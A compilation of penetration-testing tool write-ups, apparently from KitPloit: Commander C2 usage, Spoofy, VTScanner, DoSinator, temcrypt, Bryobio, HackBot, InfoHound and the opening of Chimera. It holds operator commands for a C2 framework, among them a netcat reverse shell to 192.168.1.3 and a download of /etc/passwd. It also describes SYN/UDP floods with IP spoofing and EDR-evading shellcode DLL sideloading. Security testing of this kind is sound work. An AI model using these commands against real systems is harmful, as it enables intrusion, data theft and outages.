Special attention should be given to the 'find active agents' command. This command deletes all the tables and creates them again. It might sound scary but it is not, at least that is what I believe :P

The idea behind this functionality is that the C2 server can ask an agent to re-register when it doesn't recognize it. So, since we want to clear the DB of unused old entries and at the same time find all the currently active hosts, we can drop the tables and trigger the re-register mechanism of the C2 server. See below for the re-registration mechanism.

Flows

Below you can find a normal flow diagram

Normal Flow

In case where the environment experiences a major failure like a corrupted database or some other critical failure the re-registration mechanism is enabled so we don't lose our connection with our agents.

More specifically, in case where we lose the database we will not have any information about the uuids that we are receiving thus we can't set tasks on them etc... So, the agents will keep trying to retrieve their tasks and since we don't recognize them we will ask them to register again so we can insert them in our database and we can control them again.

Below is the flow diagram for this case.

Re-register Flow

Useful examples

To set up your environment, start admin.py first, then c2_server.py, and finally run the agent. Afterwards you can check the available agents.

# show all availiable agents
show agent all

To instruct all the agents to run the command "id" you can do it like this:

# run a shell command on all agents
task add all c2-shell id

To check the history / previous results of executed tasks for a specific agent, do it like this:

# check the results of a specific agent
show result 85913eb1245d40eb96cf53eaf0b1e241

You can also change the interval at which the agents check for tasks, for example to 30 seconds, like this:

# to set it for all agents
task add all c2-sleep 30

To open a session with one or more of your agents do the following.

# find the agent/uuid
show agent all

# enable the server to accept connections
sessions server start 5555

# add a task for a session to your prefered agent
task add your_prefered_agent_uuid_here c2-session 5555

# display a list of available connections
sessions list

# select to attach to one of the sessions, lets select 0
sessions select 0

# run a command
id

# download the passwd file locally
download /etc/passwd

# list your files locally to check that passwd was created
local-ls

# upload a file (test.txt) in the directory where the agent is
upload test.txt

# return to the main cli
go back

# check if the server is running
sessions server status

# stop the sessions server
sessions server stop

If for some reason you want to run another external session, for example with netcat or Metasploit, do the following.

# show all availiable agents
show agent all

# first open a netcat on your machine
nc -vnlp 4444

# add a task to open a reverse shell for a specific agent
task add 85913eb1245d40eb96cf53eaf0b1e241 c2-shell nc -e /bin/sh 192.168.1.3 4444

This way you will have a 'die hard' shell: even if you get disconnected, it will come back up immediately. Only the interactive commands will make it die permanently.

Obfuscation

The Python agent offers obfuscation using basic AES-ECB encryption and base64 encoding.

Edit the obfuscator.py file and change the 'key' value to a 16 char length key in order to create a custom payload. The output of the new agent can be found in Agents/obs_agent.py

You can run it like this:

python3 obfuscator.py

# and to run the agent, do as usual
python3 obs_agent.py
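
For illustration, here is a minimal sketch of the AES-ECB-plus-base64 scheme described above, using pycryptodome (an assumed library choice for this sketch; it is not Commander's actual obfuscator.py):

# Hedged sketch of AES-ECB plus base64 obfuscation with pycryptodome
# (pip3 install pycryptodome). Illustrative only, not Commander's code.
import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

key = b"0123456789abcdef"  # 16-char key, as the obfuscator expects
payload = open("agent.py", "rb").read()
cipher = AES.new(key, AES.MODE_ECB)
obfuscated = base64.b64encode(cipher.encrypt(pad(payload, AES.block_size)))
print(obfuscated[:60] + b"...")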

Tips & Tricks

  1. The built-in Flask app server can't handle multiple/concurrent requests, so you can use the gunicorn server for better performance, like this:

gunicorn -w 4 "c2_server:create_app()" --access-logfile=- -b 0.0.0.0:5000 --certfile server.crt --keyfile server.key

  2. Create a binary file for your Python agent like this:

pip install pyinstaller
pyinstaller --onefile agent.py

The binary can be found under the dist directory.

In case something fails, you may need to update your Python and pip libs. If it continues failing then... well... life happened.

  3. Create new certs for each engagement.

  4. Back up your c2.db; it's easy... just a file.

Testing

pytest was used for the testing. You can run the tests like this:

cd tests/
py.test

Be careful: you must run the tests inside the tests directory, otherwise your c2.db will be overwritten and you will lose your data.

To check the code coverage and produce a nice html report you can use this:

# pip3 install pytest-cov
python -m pytest --cov=Commander --cov-report html

Disclaimer: This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Running this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Spoofy - Program That Checks If A List Of Domains Can Be Spoofed Based On SPF And DMARC Records

By: Zion3R β€” October 11th 2023 at 18:26



Spoofy is a program that checks if a list of domains can be spoofed based on SPF and DMARC records. You may be asking, "Why do we need another tool that can check if a domain can be spoofed?"

Well, Spoofy is different and here is why:

  1. Authoritative lookups on all queries, with a known fallback (Cloudflare DNS)
  2. Accurate bulk lookups
  3. Custom, manually tested spoof logic (No guessing or speculating, real world test results)
  4. SPF lookup counter

Β 

HOW TO USE

Spoofy requires Python 3+. Python 2 is not supported. Usage is shown below:

Usage:
./spoofy.py -d [DOMAIN] -o [stdout or xls]
OR
./spoofy.py -iL [DOMAIN_LIST] -o [stdout or xls]

Install Dependencies:
pip3 install -r requirements.txt
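
For background, here is a minimal sketch of the kind of SPF and DMARC lookups such a check is built on; it uses dnspython purely for illustration (an assumption, not necessarily Spoofy's own code or dependency):

# Minimal SPF/DMARC lookup sketch using dnspython (illustrative only).
import dns.resolver

def txt_records(name):
    try:
        return [b"".join(r.strings).decode() for r in dns.resolver.resolve(name, "TXT")]
    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer):
        return []

domain = "example.com"
spf = [r for r in txt_records(domain) if r.startswith("v=spf1")]
dmarc = [r for r in txt_records("_dmarc." + domain) if r.startswith("v=DMARC1")]
print("SPF:", spf or "none found")     # a missing record or a weak "?all" aids spoofing
print("DMARC:", dmarc or "none found") # "p=none" means spoofed mail is not rejected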

HOW DO YOU KNOW IT'S SPOOFABLE

(The spoofability table lists every combination of SPF and DMARC configurations that impact deliverability to the inbox, except for DKIM modifiers.) Download Here

METHODOLOGY

The creation of the spoofability table involved listing every relevant SPF and DMARC configuration, combining them, and then conducting SPF and DMARC information collection using an early version of Spoofy on a large number of US government domains. Testing if an SPF and DMARC combination was spoofable or not was done using the email security pentesting suite at emailspooftest using Microsoft 365. However, the initial testing was conducted using Protonmail and Gmail, but these services were found to utilize reverse lookup checks that affected the results, particularly for subdomain spoof testing. As a result, Microsoft 365 was used for the testing, as it offered greater control over the handling of mail.

After the initial testing using Microsoft 365, some combinations were retested using Protonmail and Gmail due to the differences in their handling of banners in emails. Protonmail and Gmail can place spoofed mail in the inbox with a banner or in spam without a banner, leading to some SPF and DMARC combinations being reported as "Mailbox Dependent" when using Spoofy. In contrast, Microsoft 365 places both conditions in spam. The testing and data collection process took several days to complete, after which a good master table was compiled and used as the basis for the Spoofy spoofability logic.

DISCLAIMER

This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software.

CREDIT

Lead / only programmer, spoofability logic comprehension upgrades, lookup resiliency system/fix (the main issue with other tools), multithreading, and feature additions: Matt Keeley

DMARC, SPF, DNS insights & Spoofability table creation/confirmation/testing & application accuracy/quality assurance: calamity.email / eman-ekaf

Logo: cobracode

Tool was inspired by Bishop Fox's project called spoofcheck.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

VTScanner - A Comprehensive Python-based Security Tool For File Scanning, Malware Detection, And Analysis In An Ever-Evolving Cyber Landscape

By: Zion3R β€” September 12th 2023 at 11:30

VTScanner is a versatile Python tool that empowers users to perform comprehensive file scans within a selected directory for malware detection and analysis. It seamlessly integrates with the VirusTotal API to deliver extensive insights into the safety of your files. VTScanner is compatible with Windows, macOS, and Linux, making it a valuable asset for security-conscious individuals and professionals alike.


Features

1. Directory-Based Scanning

VTScanner enables users to choose a specific directory for scanning. By doing so, you can assess all the files within that directory for potential malware threats.

2. Detailed Scan Reports

Upon completing a scan, VTScanner generates detailed reports summarizing the results. These reports provide essential information about the scanned files, including their hash, file type, and detection status.

3. Hash-Based Checks

VTScanner leverages file hashes for efficient malware detection. By comparing the hash of each file to known malware signatures, it can quickly identify potential threats.
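
To make the hash-based flow concrete, here is a minimal, hedged sketch (illustrative only, not VTScanner's actual implementation; the file name and API key are placeholders) of hashing a file and looking it up via the VirusTotal v3 API:

# Hedged sketch: hash a file and look it up on VirusTotal (API v3);
# not VTScanner's actual code. "sample.bin" is a placeholder path.
import hashlib
import requests

API_KEY = "YOUR_VT_API_KEY"  # supply your own key from config

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

file_hash = sha256_of("sample.bin")
resp = requests.get(
    f"https://www.virustotal.com/api/v3/files/{file_hash}",
    headers={"x-apikey": API_KEY},
)
if resp.status_code == 404:
    print("Hash unknown to VirusTotal")  # VTScanner would submit it for analysis
else:
    stats = resp.json()["data"]["attributes"]["last_analysis_stats"]
    print(f"{file_hash}: {stats['malicious']} engines flag this file")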

4. VirusTotal Integration

VTScanner interacts seamlessly with the VirusTotal API. If a file has not been scanned on VirusTotal previously, VTScanner automatically submits its hash for analysis. It then waits for the response, allowing you to access comprehensive VirusTotal reports.

5. Time Delay Functionality

For users with free VirusTotal accounts, VTScanner offers a time delay feature. This function introduces a specified delay (recommended between 20-25 seconds) between each scan request, ensuring compliance with VirusTotal's rate limits.

6. Premium API Support

If you have a premium VirusTotal API account, VTScanner provides the option for concurrent scanning. This feature allows you to optimize scanning speed, making it an ideal choice for more extensive file collections.

7. Interactive VirusTotal Exploration

VTScanner goes the extra mile by enabling users to explore VirusTotal's detailed reports for any file with a simple double-click. This feature offers valuable insights into file detections and behavior.

8. Preinstalled Windows Binaries

For added convenience, VTScanner comes with preinstalled Windows binaries compiled using PyInstaller. These binaries are detected by 10 antivirus scanners.

9. Custom Binary Generation

If you prefer to generate your own binaries or use VTScanner on non-Windows platforms, you can easily create custom binaries with PyInstaller.

Installation

Prerequisites

Before installing VTScanner, make sure you have the following prerequisites in place:

  • Python 3.6 installed on your system.
pip install -r requirements.txt

Download VTScanner

You can acquire VTScanner by cloning the GitHub repository to your local machine:

git clone https://github.com/samhaxr/VTScanner.git

Usage

To initiate VTScanner, follow these steps:

cd VTScanner
python3 VTScanner.py

Configuration

  • Set the time delay between scan requests.
  • Enter your VirusTotal API key in config.ini

License

VTScanner is released under the GPL License. Refer to the LICENSE file for full licensing details.

Disclaimer

VTScanner is a tool designed to enhance security by identifying potential malware threats. However, it's crucial to remember that no tool provides foolproof protection. Always exercise caution and employ additional security measures when handling files that may contain malicious content. For inquiries, issues, or feedback, please don't hesitate to open an issue on our GitHub repository. Thank you for choosing VTScanner v1.0.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

DoSinator - A Powerful Denial Of Service (DoS) Testing Tool

By: Zion3R β€” September 5th 2023 at 22:42


DoSinator is a versatile Denial of Service (DoS) testing tool developed in Python. It empowers security professionals and researchers to simulate various types of DoS attacks, allowing them to assess the resilience of networks, systems, and applications against potential cyber threats.Β 


Features

  • Multiple Attack Modes: DoSinator supports SYN Flood, UDP Flood, and ICMP Flood attack modes, allowing you to simulate various types of DoS attacks.
  • Customizable Parameters: Adjust the packet size, attack rate, and duration to fine-tune the intensity and duration of the attack.
  • IP Spoofing: Enable IP spoofing to mask the source IP address and enhance anonymity during the attack.
  • Multithreaded Packet Sending: Utilize multiple threads for simultaneous packet sending, maximizing the attack speed and efficiency.

Requirements

  • Python 3.x
  • scapy
  • argparse

Installation

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/DoSinator.git
  2. Navigate to the project directory:

    cd DoSinator
  3. Install the required dependencies:

    pip install -r requirements.txt

Usage

usage: dos_tool.py [-h] -t TARGET -p PORT [-np NUM_PACKETS] [-ps PACKET_SIZE]
[-ar ATTACK_RATE] [-d DURATION] [-am {syn,udp,icmp,http,dns}]
[-sp SPOOF_IP] [--data DATA]

optional arguments:
-h, --help Show this help message and exit.
-t TARGET, --target TARGET
Target IP address.
-p PORT, --port PORT Target port number.
-np NUM_PACKETS, --num_packets NUM_PACKETS
Number of packets to send (default: 500).
-ps PACKET_SIZE, --packet_size PACKET_SIZE
Packet size in bytes (default: 64).
-ar ATTACK_RATE, --attack_rate ATTACK_RATE
Attack rate in packets per second (default: 10).
-d DURATION, --duration DURATION
Duration of the attack in seconds.
-am {syn,udp,icmp,http,dns}, --attack-mode {syn,udp,icmp,http,dns}
Attack mode (default: syn).
-sp SPOOF_IP, --spoof-ip SPOOF_IP
Spoof IP address.
--data DATA Custom data string to send.
  • target_ip: IP address of the target system.
  • target_port: Port number of the target service.
  • num_packets: Number of packets to send (default: 500).
  • packet_size: Size of each packet in bytes (default: 64).
  • attack_rate: Attack rate in packets/second (default: 10).
  • duration: Duration of the attack in seconds.
  • attack_mode: Attack mode: syn, udp, icmp, http (default: syn).
  • spoof_ip: Spoof IP address (default: None).
  • data: Custom data string to send.

Disclaimer

The usage of the Dosinator tool for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws. The author assumes no liability and is not responsible for any misuse or damage caused by this program.

By using Dosinator, you agree to use this tool for educational and ethical purposes only. The author is not responsible for any actions or consequences resulting from misuse of this tool.

Please ensure that you have the necessary permissions to conduct any form of testing on a target network. Use this tool at your own risk.

Contributing

Contributions are welcome! If you find any issues or have suggestions for improvements, feel free to open an issue or submit a pull request.

Contact

If you have any questions, comments, or suggestions about Dosinator, please feel free to contact me:



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Temcrypt - Evolutionary Encryption Framework Based On Scalable Complexity Over Time

By: Zion3R β€” August 31st 2023 at 12:30


The Next-gen Encryption

Try temcrypt on the Web β†’

temcrypt SDK

Focused on protecting highly sensitive data, temcrypt is an advanced multi-layer data evolutionary encryption mechanism that offers scalable complexity over time, and is resistant to common brute force attacks.

You can create your own applications, scripts and automations when deploying it.

Knowledge

Find out what temcrypt stands for, the features and inspiration that led me to create it and much more. READ THE KNOWLEDGE DOCUMENT. This is very important to you.


Compatibility

temcrypt is compatible with both Node.js v18 or later and modern web browsers, allowing you to use it in various environments.

Getting Started

The only dependencies temcrypt uses are crypto-js, for handling encryption algorithms like AES-256, SHA-256 and some encoders, and fs, which is used for file handling with Node.js.

To use temcrypt, you need to have Node.js installed. Then, you can install temcrypt using npm:

npm install temcrypt

after that, import it in your code as follows:

const temcrypt = require("temcrypt");

temcrypt includes an auto-install feature for its dependencies, so you don't have to worry about installing them manually. Just run the temcrypt.js library and the dependencies will be installed automatically, then call it in your code; this was done to make it portable:

node temcrypt.js

Alternatively, you can use temcrypt directly in the browser by including the following script tag:

<script src="temcrypt.js"></script>

or minified:

<script src="temcrypt.min.js"></script>

You can also call the library on your website or web application from a CDN:

<script src="https://cdn.jsdelivr.net/gh/jofpin/temcrypt/temcrypt.min.js"></script>

Usage

ENCRYPT & DECRYPT

temcrypt provides functions like encrypt and decrypt to securely protect and disclose your information.

Parameters

  • dataString (string): The string data to encrypt.
  • dataFiles (string): The file path to encrypt. Provide either dataString or dataFiles.
  • mainKey (string): The main key (private) for encryption.
  • extraBytes (number, optional): Additional bytes to add to the encryption. Is an optional parameter used in the temcrypt encryption process. It allows you to add extra bytes to the encrypted data, increasing the complexity of the encryption, which requires more processing power to decrypt. It also serves to make patterns lose by changing the weight of the encryption.

Returns

  • If successful:
    • status (boolean): true to indicate successful decryption.
    • hash (string): The unique hash generated for the legitimacy verify of the encrypted data.
    • dataString (string) or dataFiles: The decrypted string or the file path of the decrypted file, depending on the input.
    • updatedEncryptedData (string): The updated encrypted data after decryption. The updated encrypted data after decryption. Every time the encryption is decrypted, the output is updated, because the mainKey changes its order and the new date of last decryption is saved.
    • creationDate (string): The creation date of the encrypted data.
    • lastDecryptionDate (string): The date of the last successful decryption of the data.
  • If dataString is provided:
    • hash (string): The unique hash generated for the legitimacy verify of the encrypted data.
    • mainKey (string): The main key (private) used for encryption.
    • timeKey (string): The time key (private) of the encryption.
    • dataString (string): The encrypted string.
    • extraBytes (number, optional): The extra bytes used for encryption.
  • If dataFiles is provided:
    • hash (string): The unique hash generated for the legitimacy verify of the encrypted data.
    • mainKey (string): The main key used for encryption.
    • timeKey (string): The time key of the encryption.
    • dataFiles (string): The file path of the encrypted file.
    • extraBytes (number, optional): The extra bytes used for encryption.
  • If decryption fails:
    • status (boolean): false to indicate decryption failure.
    • error_code (number): An error code indicating the reason for decryption failure.
    • message (string): A descriptive error message explaining the decryption failure.

Here are some examples of how to use temcrypt. Please note that when encrypting, you must enter a key and save the hour and minute that you encrypted the information. To decrypt the information, you must use the same main key at the same hour and minute on subsequent days:

Encrypt a String

const dataToEncrypt = "Sensitive data";
const mainKey = "your_secret_key"; // Insert your custom key

const encryptedData = temcrypt.encrypt({
  dataString: dataToEncrypt,
  mainKey: mainKey
});

console.log(encryptedData);

Decrypt a String

const encryptedData = "..."; // Encrypted data obtained from the encryption process
const mainKey = "your_secret_key";

const decryptedData = temcrypt.decrypt({
  dataString: encryptedData,
  mainKey: mainKey
});

console.log(decryptedData);

Encrypt a File:

To encrypt a file using temcrypt, you can use the encrypt function with the dataFiles parameter. Here's an example of how to encrypt a file and obtain the encryption result:

const temcrypt = require("temcrypt");

const filePath = "path/test.txt";
const mainKey = "your_secret_key";

const result = temcrypt.encrypt({
  dataFiles: filePath,
  mainKey: mainKey,
  extraBytes: 128 // Optional: Add 128 extra bytes
});

console.log(result);

In this example, replace 'test.txt' with the actual path to the file you want to encrypt and set 'your_secret_key' as the main key for the encryption. The result object will contain the encryption details, including the unique hash, main key, time key, and the file path of the encrypted file.

Decrypt a File:

To decrypt a file that was previously encrypted with temcrypt, you can use the decrypt function with the dataFiles parameter. Here's an example of how to decrypt a file and obtain the decryption result:

const temcrypt = require("temcrypt");

const filePath = "path/test.txt.trypt";
const mainKey = "your_secret_key";

const result = temcrypt.decrypt({
  dataFiles: filePath,
  mainKey: mainKey
});

console.log(result);

In this example, replace 'path/test.txt.trypt' with the actual path to the encrypted file, and set 'your_secret_key' as the main key for decryption. The result object will contain the decryption status and the decrypted data, if successful.

Remember to provide the correct main key used during encryption to successfully decrypt the file, at the exact same hour and minute at which it was encrypted. If the main key is wrong, the file was tampered with, or the time is wrong, the decryption status will be false and the decrypted data will not be available.


UTILS

temcrypt provides utils functions to perform additional operations beyond encryption and decryption. These utility functions are designed to enhance the functionality and usability.

Function List:

  1. changeKey: Change your encryption mainKey
  2. check: Check if the encryption belongs to temcrypt
  3. verify: Checks if a hash matches the legitimacy of the encrypted output.

Below, you can see the details and how to implement its uses.

Update MainKey:

The changeKey utility function allows you to change the mainKey used to encrypt the data while keeping the encrypted data intact. This is useful when you want to enhance the security of your encrypted data or update the mainKey periodically.

Parameters

  • dataFiles (optional): The path to the file that was encrypted using temcrypt.
  • dataString (optional): The encrypted string that was generated using temcrypt.
  • mainKey (string): The current mainKey used to encrypt the data.
  • newKey(string): The new mainKey that will replace the current mainKey.
const temcrypt = require("temcrypt");

const filePath = "test.txt.trypt";
const currentMainKey = "my_recent_secret_key";
const newMainKey = "new_recent_secret_key";

// Update mainKey for the encrypted file
const result = temcrypt.utils({
changeKey: {
dataFiles: filePath,
mainKey: currentMainKey,
newKey: newMainKey
}
});

console.log(result.message);

Check Data Integrity:

The check utility function allows you to verify the integrity of the data encrypted using temcrypt. It checks whether a file or a string is a valid temcrypt encrypted data.

Parameters

  • dataFiles (optional): The path to the file that you want to check.
  • dataString (optional): The encrypted string that you want to check.
const temcrypt = require("temcrypt");

const filePath = "test.txt.trypt";
const encryptedString = "..."; // Encrypted string generated by temcrypt

// Check the integrity of the encrypted File
const result = temcrypt.utils({
  check: {
    dataFiles: filePath
  }
});

console.log(result.message);

// Check the integrity of the encrypted String
const result2 = temcrypt.utils({
  check: {
    dataString: encryptedString
  }
});

console.log(result2.message);

Verify Hash:

The verify utility function allows you to verify the integrity of encrypted data using its hash value. Checks if the encrypted data output matches the provided hash value.

Parameters

  • hash (string): The hash value to verify against.
  • dataFiles (optional): The path to the file whose hash you want to verify.
  • dataString (optional): The encrypted string whose hash you want to verify.
const temcrypt = require("temcrypt");

const filePath = "test.txt.trypt";
const hashToVerify = "..."; // The hash value to verify

// Verify the hash of the encrypted File
const result = temcrypt.utils({
  verify: {
    hash: hashToVerify,
    dataFiles: filePath
  }
});

console.log(result.message);

// Verify the hash of the encrypted String
const encryptedString = "..."; // Encrypted string generated by temcrypt
const result2 = temcrypt.utils({
  verify: {
    hash: hashToVerify,
    dataString: encryptedString
  }
});
});

console.log(result2.message);

Error Codes

The following table presents the important error codes and their corresponding error messages used by temcrypt to indicate various error scenarios.

Code Error Message Description
420 Decryption time limit exceeded The decryption process took longer than the allowed time limit.
444 Decryption failed The decryption process encountered an error.
777 No data provided No data was provided for the operation.
859 Invalid temcrypt encrypted string The provided string is not a valid temcrypt encrypted string.

Examples

Check out the examples directory for more detailed usage examples.

WARNING

The encryption size of a string or file should be less than 16 KB (kilobytes). If it's larger, you must have enough computational power to decrypt it. Otherwise, your personal computer will exceed the time required to find the correct main key combination and proper encryption formation, and it won't be able to decrypt the information.

TIPS

  1. With temcrypt you can only decrypt your information on later days with the key you entered, at the same hour and minute at which you encrypted it.
  2. Focus on time: it is recommended to start the decryption within the first 2 to 10 seconds, so you have an advantage in generating the correct key formation.

License

The content of this project itself is licensed under the Creative Commons Attribution 3.0 license, and the underlying source code used to format and display that content is licensed under the MIT license.

Copyright (c) 2023 by Jose Pino



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Bryobio - NETWORK Pcap File Analysis

By: Zion3R β€” August 18th 2023 at 12:30


Network pcap file analysis tool, developed to speed up SOC analysts' processes during analysis.


Tested

OK Debian
OK Ubuntu

Requirements

$ pip install pyshark
$ pip install dpkt

Also required: Wireshark, Tshark, Mergecap, Ngrep
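
Since Bryobio builds on pyshark, here is a minimal, hedged illustration of the kind of pcap triage pyshark enables (not Bryobio's own code; the capture file name is a placeholder):

# Hedged illustration of pyshark-based pcap triage (not Bryobio's code).
import pyshark

cap = pyshark.FileCapture("traffic.pcap", display_filter="dns")  # placeholder pcap
for pkt in cap:
    if hasattr(pkt.dns, "qry_name"):
        print(pkt.dns.qry_name)  # queried domain names, for quick SOC triage
cap.close()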

π—œπ—‘π—¦π—§π—”π—Ÿπ—Ÿπ—”π—§π—œπ—’π—‘ π—œπ—‘π—¦π—§π—₯π—¨π—–π—§π—œπ—’π—‘π—¦

$ git clone https://github.com/emrekybs/Bryobio.git
$ cd Bryobio
$ chmod +x bryobio.py

$ python3 bryobio.py



☐ β˜† βœ‡ KitPloit - PenTest Tools!

HackBot - A Simple Cli Chatbot Having Llama2 As Its Backend Chat AI

By: Zion3R β€” August 17th 2023 at 12:30


Welcome to HackBot, an AI-powered cybersecurity chatbot designed to provide helpful and accurate answers to your cybersecurity-related queries, and also to perform code analysis and scan analysis. Whether you are a security researcher, an ethical hacker, or just curious about cybersecurity, HackBot is here to assist you in finding the information you need.

HackBot utilizes the powerful language model Meta-LLama2 through the "LlamaCpp" library. This allows HackBot to respond to your questions in a coherent and relevant manner. Please make sure to keep your queries in English and adhere to the guidelines provided to get the best results from HackBot.
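
For orientation, here is a minimal, hedged sketch of driving a local Llama 2 chat model with the llama-cpp-python bindings (illustrative only; this is not HackBot's actual source, and the model format your llama-cpp-python version accepts may differ):

# Hedged sketch of local Llama 2 inference via llama-cpp-python
# (pip install llama-cpp-python); not HackBot's actual code.
from llama_cpp import Llama

llm = Llama(model_path="llama-2-7b-chat.ggmlv3.q4_0.bin")  # the model HackBot downloads
out = llm("Q: What is SQL injection? A:", max_tokens=128, stop=["Q:"])
print(out["choices"][0]["text"])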


Features

  • AI Cybersecurity Chat: HackBot can answer various cybersecurity-related queries, helping you with penetration testing, security analysis, and more.
  • Interactive Interface: The chatbot provides an interactive command-line interface, making it easy to have conversations with HackBot.
  • Clear Output: HackBot presents its responses in a well-formatted markdown, providing easily readable and organized answers.
  • Static Code Analysis: Utilizes the provided scan data or log file for conducting static code analysis. It thoroughly examines the source code without executing it, identifying potential vulnerabilities, coding errors, and security issues.
  • Vulnerability Analysis: Performs a comprehensive vulnerability analysis using the provided scan data or log file. It identifies and assesses security weaknesses, misconfigurations, and potential exploits present in the target system or network.

How it looks

Chat:

Static Code analysis:

Vulnerability analysis:

Installation

Prerequisites

Before you proceed with the installation, ensure you have the following prerequisites:

Step 1: Clone the Repository

git clone https://github.com/morpheuslord/hackbot.git
cd hackbot

Step 2: Install Dependencies

pip install -r requirements.txt

Step 3: Download the AI Model

python hackbot.py

The first time you run HackBot, it will check for the AI model required for the chatbot. If the model is not present, it will be automatically downloaded and saved as "llama-2-7b-chat.ggmlv3.q4_0.bin" in the project directory.

Usage

To start a conversation with HackBot, run the following command:

python hackbot.py

HackBot will display a banner and wait for your input. You can ask cybersecurity-related questions, and HackBot will respond with informative answers. To exit the chat, simply type "quit_bot" in the input prompt.

Here are some additional commands you can use:

  • clear_screen: Clears the console screen for better readability.
  • quit_bot: This is used to quit the chat application
  • bot_banner: Prints the default bots banner.
  • contact_dev: Provides my contact information.
  • save_chat: Saves the current sessions interactions.
  • vuln_analysis: Does a Vuln analysis using the scan data or log file.
  • static_code_analysis: Does a Static code analysis using the scan data or log file.

Note: I am working on more addons and more such commands to give a more ChatGPT-like experience.

Please Note: HackBot's responses are based on the Meta-LLama2 AI model, and its accuracy depends on the quality of the queries and data provided to it.

I am also working on AI training by which I can teach it how to be more accurately tuned to work for hackers on a much more professional level.

Contributing

We welcome contributions to improve HackBot's functionality and accuracy. If you encounter any issues or have suggestions for enhancements, please feel free to open an issue or submit a pull request. Follow these steps to contribute:

  1. Fork the repository.
  2. Create a new branch with a descriptive name.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request to the main branch of this repository.

Please maintain a clean commit history and adhere to the project's coding guidelines.

AI training

If anyone has the know-how to train text-generation models, help improving the code would be very welcome.

Contact

For any questions, feedback, or inquiries related to HackBot, feel free to contact the project maintainer:



☐ β˜† βœ‡ KitPloit - PenTest Tools!

InfoHound - An OSINT To Extract A Large Amount Of Data Given A Web Domain Name

By: Zion3R β€” August 16th 2023 at 20:58


During the reconnaissance phase, an attacker searches for any information about their target to create a profile that will later help them identify possible ways to get into an organization. InfoHound performs passive analysis techniques (which do not interact directly with the target) using OSINT to extract a large amount of data given a web domain name. This tool will retrieve emails, people, files, subdomains, usernames and URLs that will later be analyzed to extract even more valuable information.


Infohound architecture

Installation

git clone https://github.com/xampla/InfoHound.git
cd InfoHound/infohound
mv infohound_config.sample.py infohound_config.py
cd ..
docker-compose up -d

You must add API Keys inside infohound_config.py file

Default modules

InfoHound has two different types of modules: those that retrieve data and those that analyze it to extract more relevant information.

Retrieval modules

Name Description
Get Whois Info Get relevant information from Whois register.
Get DNS Records This task queries the DNS.
Get Subdomains This task uses Alienvault OTX API, CRT.sh, and HackerTarget as data sources to discover cached subdomains.
Get Subdomains From URLs Once some tasks have been performed, the URLs table will have a lot of entries. This task will check all the URLs to find new subdomains.
Get URLs It searches all URLs cached by Wayback Machine and saves them into the database. This will later help to discover other data entities like files or subdomains.
Get Files from URLs It loops through the URLs database table to find files and store them in the Files database table for later analysis. The files that will be retrieved are: doc, docx, ppt, pptx, pps, ppsx, xls, xlsx, odt, ods, odg, odp, sxw, sxc, sxi, pdf, wpd, svg, indd, rdp, ica, zip, rar
Find Email It looks for emails using queries to Google and Bing.
Find People from Emails Once some emails have been found, it can be useful to discover the person behind them. Also, it finds usernames from those people.
Find Emails From URLs Sometimes, the discovered URLs can contain sensitive information. This task retrieves all the emails from URL paths.
Execute Dorks It will execute the dorks defined in the dorks folder. Remember to group the dorks by categories (filename) to understand their objectives.
Find Emails From Dorks By default, InfoHound has some dorks defined to discover emails. This task will look for them in the results obtained from dork execution.

Analysis

Name Description
Check Subdomains Take-Over It performs some checks to determine if a subdomain can be taken over.
Check If Domain Can Be Spoofed It checks if a domain, from the emails InfoHound has discovered, can be spoofed. This could be used by attackers to impersonate a person and send emails as him/her.
Get Profiles From Usernames This task uses the discovered usernames from each person to find profiles from services or social networks where that username exists. This is performed using the Maigret tool. It is worth noting that although a profile with the same username is found, it does not necessarily mean it belongs to the person being analyzed.
Download All Files Once files have been stored in the Files database table, this task will download them in the "download_files" folder.
Get Metadata Using exiftool, this task will extract all the metadata from the downloaded files and save it to the database.
Get Emails From Metadata As some metadata can contain emails, this task will retrieve all of them and save them to the database.
Get Emails From Files Content Usually, emails can be included in corporate files, so this task will retrieve all the emails from the downloaded files' content.
Find Registered Services using Emails It is possible to find services or social networks where an email has been used to create an account. This task will check if an email InfoHound has discovered has an account in Twitter, Adobe, Facebook, Imgur, Mewe, Parler, Rumble, Snapchat, Wordpress, and/or Duolingo.
Check Breach This task checks Firefox Monitor service to see if an email has been found in a data breach. Although it is a free service, it has a limitation of 10 queries per day. If Leak-Lookup API key is set, it also checks it.

Custom modules

InfoHound lets you create custom modules; you just need to add your script inside infohound/tool/custom_modules. One custom module has been added as an example: it uses the Holehe tool to check if the previously discovered emails are attached to an account on sites like Twitter, Instagram, Imgur and more than 120 others.
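
For orientation, here is a purely hypothetical sketch of what such a script might look like; the function shape and the lookup URL below are assumptions, so mirror the bundled Holehe example for the real structure:

# Purely hypothetical custom-module sketch; adapt to InfoHound's real
# module interface. api.example.com is a placeholder URL.
import requests

def check_email(email):
    resp = requests.get("https://api.example.com/lookup",
                        params={"email": email}, timeout=10)
    return {"email": email, "found": resp.status_code == 200}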

Inspired by



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Chimera - Automated DLL Sideloading Tool With EDR Evasion Capabilities

By: Zion3R β€” August 14th 2023 at 12:30


While DLL sideloading can be used for legitimate purposes, such as loading necessary libraries for a program to function, it can also be used for malicious purposes. Attackers can use DLL sideloading to execute arbitrary code on a target system, often by exploiting vulnerabilities in legitimate applications that are used to load DLLs.

To automate the DLL sideloading process and make it more effective, Chimera was created: a tool that includes evasion methodologies to bypass EDR/AV products. The tool can automatically encrypt a shellcode via XOR with a random key and create template files that can be imported into Visual Studio to create a malicious DLL.
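
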